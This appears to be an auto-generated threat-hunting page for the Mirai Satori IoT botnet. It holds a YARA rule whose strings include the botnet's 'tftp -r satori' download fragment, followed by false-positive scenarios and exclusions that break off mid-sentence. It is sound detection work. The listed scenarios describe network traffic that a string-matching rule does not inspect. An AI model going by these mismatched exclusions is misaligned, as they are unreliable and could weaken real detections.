Adversaries may use Mirai Satori_gen to scan for vulnerable IoT devices, leveraging weak credentials to establish initial access. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate potential botnet activity before it leads to larger-scale attacks.
YARA Rule
rule is__Mirai_Satori_gen {
meta:
description = "Detects Mirai Satori_gen"
reference = "https://www.reddit.com/r/LinuxMalware/comments/7p00i3/quick_notes_for_okiru_satori_variant_of_mirai/"
date = "2018-01-05"
strings:
$st08 = "tftp -r satori" fullword nocase wide ascii
$st09 = "/bins/satori" fullword nocase wide ascii
$st10 = "satori" fullword nocase wide ascii
$st11 = "SATORI" fullword nocase wide ascii
condition:
2 of them
}This YARA rule can be deployed in the following contexts:
This rule contains 4 string patterns in its detection logic.
Scenario: Scheduled System Backup Using rsync
Description: A legitimate scheduled backup task using rsync may generate traffic patterns similar to Mirai botnet activity, especially when transferring large volumes of data.
Filter/Exclusion: Exclude traffic originating from known backup servers or processes using rsync with specific command-line arguments (e.g., rsync --backup --backup-dir=/backup).
Scenario: Admin Task Using nc for Network Diagnostics
Description: System administrators may use nc (netcat) for network testing or port scanning as part of routine diagnostics or troubleshooting.
Filter/Exclusion: Exclude connections initiated from admin workstations or users with elevated privileges, or filter by known admin IP ranges and user agents.
Scenario: Cron Job for Log Rotation
Description: A cron job that rotates logs using tools like logrotate may generate high volume of small TCP connections, which could be mistaken for Mirai botnet traffic.
Filter/Exclusion: Exclude traffic from processes associated with logrotate or from specific cron job directories (e.g., /etc/cron.daily/).
Scenario: Remote Desktop Protocol (RDP) Session
Description: A legitimate RDP session may involve multiple connection attempts or keep-alive packets that resemble botnet communication patterns.
Filter/Exclusion: Exclude traffic from known RDP clients or IP addresses associated with internal user access, or filter based on the presence of RDP-specific headers or payloads.
Scenario: Database Replication Using mysqldump
Description: Database replication tasks using mysqldump can generate high-frequency connection attempts and data transfers that may trigger the Mirai Satori_gen rule.
Filter/Exclusion: Exclude traffic from database replication servers or processes using `mysq